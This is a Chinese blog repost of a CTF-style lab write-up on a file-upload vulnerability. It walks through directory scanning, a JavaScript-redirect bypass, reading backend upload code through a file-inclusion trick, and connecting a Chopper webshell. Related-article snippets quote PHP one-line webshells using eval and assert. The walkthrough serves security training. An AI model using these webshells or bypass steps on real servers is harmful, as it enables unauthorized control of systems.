取文件 shell_webshell文件上传分析溯源

最新推荐文章于 2022-11-28 12:14:00 发布
最新推荐文章于 2022-11-28 12:14:00 发布
阅读量158 收藏
点赞数
文章标签: 取文件 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35723924/article/details/112621474
版权

            由于最近比较忙,暂时没有时间更新,所以分享分享一些其他博主文章,大家敬请谅解

摘要: dirbuster扫描目录发现几个有用的东东/admin/upload.php/admin/upload1.php/admin/upload2.php访问的时候最后都会跳转到/admin/upload...

dirbuster扫描目录发现几个有用的东东

/admin/upload.php
/admin/upload1.php
/admin/upload2.php

访问的时候最后都会跳转到/admin/upload2.php 前端没任何东西

但是/admin/upload1.php会有一个弹窗,查看一下前端代码

view-source:http://219.153.49.228:43799/admin/upload1.php

会发现

Markup

<script language=javascript>alert('您无权限访问!');window.open('upload2.php','_top');script>    
<form enctype="multipart/form-data" action="upload_file.php" method="post">     
Send this file: <input name="filename" type="file">     
<input type="hidden" name="verify" value="f8fc6604c7150e1d"/>    
<input type="submit" value="Send File">     
form>

第一行调用了javascript,我们在浏览器里把JavaScript禁用就能正常访问了

而且这里有个亮眼的点

先抓一下访问包,再抓一下上传包

a230beb90952dec8deedd56b7b835192.png

d6c7c2b296a8cfc2d67510b32a8af181.png

可以看到,upload_file.php是用来处理数据的,upload1.php我猜测是来生成cookie的它读取服务器上的一个txt文件,这里很有可能存在文件包含漏洞

尝试一下把uploadmd5的值改为upload_file.php

读取一下后端代码d4c24e06baa3e01e70e186d8028d8c84.png 

对这段代码进行分析

PHP

<?php 
$path="uploadfile/";//上传路径
$verify=$_POST["verify"];//接收verify参数
$time=date("Ymd");//取当前日期,今天是20200515
if($_FILES["filename"]["name"])  
{  
$file1=$_FILES["filename"]["name"];//取上传文件名
$file2 = $path.$time.'_'.$verify.'_'.$file1;  //拼接字符串,分析一下大概就是/uploadfile/20200515_f8fc6604c7150e1d_shell.php
$flag=1;  
}  
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);  
if($result) echo "上传成功!";  

?>

菜刀链接即可

PHP

http://219.153.49.228:43799/admin/uploadfile/20200515_f8fc6604c7150e1d_shell.php?a=1Q2W3E

bf136888b65799886af0c72102ab8b1b.png

新锐奢宠
关注
墨者学院-WebShell文件上传分析溯源(第2题)
qq_47094508的博客
02-04 2459
拿到题目后出现以下画面 使用目录扫描工具一把梭 推荐御剑 御剑 子域名挖掘机 subdomainbrute都可以 当我们尝试去访问upload1的时候会出现无权访问并跳转到302 http://219.153.49.228:49870/admin/upload1.php 从burp里面看确实上传点就在upload1.php 只要禁用js就能够上传文件 来到上传点之后我们上传一个webshell 上传成功之后并没有返回路径 通过burp...
墨者学院WebShell文件上传漏洞分析溯源
gudugeji的博客
10-22 391
1.第一题 编写一句话木马,然后上传文件,改文件不可上传,改后缀为php5 然后用菜刀连接 连接成功打开html,得到flag 2.第二题 上传shell图片,burp抓包,改jpg为php,点Forward,然后菜刀连接,同题1 ...
墨者学院 - WebShell代码分析溯源(第2题)
多崎巡礼的博客
07-31 750
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
【墨者学院】WebShell文件上传漏洞分析溯源(第2题)
最新发布
m0_66835614的博客
11-28 1254
【墨者学院】WebShell文件上传漏洞分析溯源(第2题)
0x0A.WebShell文件上传漏洞分析溯源(第2题)
qq_31679787的博客
09-21 281
上传一句话木马,发现做了js限制; 将一句话木马文件后缀改为jpg格式上传,绕过js检测,使用bp抓包后修改文件后缀为php; 成功上传,并得到路径; 验证发现能够进行编译; 使用菜刀连接; 在根目录下找到key文件,打开得到key; ...
WebShell文件上传漏洞分析溯源(第2题)
jeehoon的博客
11-13 213
这道题在我打开burpsuite忘记关的时候,我上传了一个.txt文件,发现它还是警告我不能上传,说明这道题目在前端就做了限制,那么我们只需要用burpsuite绕过前端,改包就可以上传一句话木马,先上传一个符合格式的文件 此处改成php文件 成功返回地址uploads/test.php,然后打开菜刀连接,找到key ...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第1题)
qq_43233085的博客
01-15 1085
墨者靶场 入门:WebShell文件上传漏洞分析溯源 第1题题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
JspMaster-Release-1.02_webshell管理_
09-29
1. **文件上传与下载**:用户可以上传新的JSP shell文件到服务器,也可以下载已存在的文件以便分析或清除。 2. **远程执行命令**:通过webshell,JspMaster允许执行服务器上的系统命令,这在测试系统漏洞或者排查...
Webshell文件上传漏洞
野原新之助
11-14 3300
简述: 文件上传漏洞是由于网站对上传的文件没有进行严格筛查,导致用户可以上传一些可执行文件的恶意代码,或webshell,如asp,hph等,然后再通过url访问执行恶意代码,或是通过webshell,达到对网站的控制。 本次在一个靶场题目上进行测试:WebShell文件上传漏洞分析溯源 过程: 界面: 前端检测查看 不属于前端检测 00截断测试 1、创建一句话木马:<?ph...
墨者 - WebShell文件上传漏洞分析溯源(第2题)
吃肉唐僧的博客
06-30 979
直接上传php文件,发现前端有js校验 核心思路:绕过前端js校验 方法1 试一下,用bp抓包修改后缀绕过,先改文件后缀为jpg 上传成功 直接菜刀无惧链接 方法2 关闭浏览器得js 火狐搜索about:config 搜索java script .enabled,切换为false 上传成功 接下来同样菜刀无惧链接,获得控...
墨者——WebShell文件上传漏洞分析溯源(第2题)
qq_43793775的博客
09-25 312
背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞 实训目的 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法; 3、了解WebShell是什么及其作用; 4、了解JavaScript基本语法; 5、了解JavaScri...
墨者学院-WebShell文件上传漏洞分析溯源(第2题)
JimWu的博客
09-05 371
WebShell文件上传漏洞分析溯源(第2题) 难易程度:★ 题目类型:文件上传 使用工具:360安全浏览器、菜刀 1.打开靶场,尝试上传php文件。 上传失败,提示只能上传gif、jpg、png类型的文件。 2.使用开发者工具F12查看源码,可以发现是前端验证。 3.可以利用浏览器工具禁用js,绕过验证。 这里我使用的是360安全浏览器,在工具–Internet选项–安全–自定义级别中禁用即...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 971
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
墨者学院 - WebShell文件上传漏洞分析溯源(第2题)
多崎巡礼的博客
07-30 880
直接上传php文件 发现前端存在js验证,只能识别图片格式的文件进行上传,这里有两种方法: 第一种是:将一句话木马1.php的后缀名改成.jpg格式的然后进行上传,用burpsuit进行对文件格式改为1.php,上传成功后用菜刀进行链接获shell,并找到key. 第二种是:  先在浏览器输入about:config(仅限于火狐浏览器),然后搜索java script .enabled将切...
【墨者学院writeup】WebShell文件上传漏洞分析溯源(第2题)题目思路
iqiqiya的博客
05-23 1751
这道题直接改后缀名先上传 burpsuit截包  再改回.php即可成功上传webshell前提记得设置浏览器设置代理127.0.0.1:8080   打开burpsuit将.jpg改成.php   点击forward即可上传成功然后菜刀链接即可得到KEY...
墨者WebShell文件上传漏洞分析溯源(第2题)题解
zr1213159840的博客
12-28 461
这题题干说的很清楚,js绕过,所以后面做题从这个方面考虑 首先我们要判断网页是什么代码,以便准备好代码 先随便上传一个文件,发现是php 那我们准备好php一句话木马 <?php @eval($_POST['woshimuma']);?> 引号括起来的就是连接的密码。 接着我们通过按下F12观察下页面的代码 很明显存在过滤,这时我们可以采两种方法,第一种是使用bp修改,第二种是修改前端的判断函数。以bp修改为例子往下做 点击上传,然后使用bp拦截后修改为php 上传过去 上传成功
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值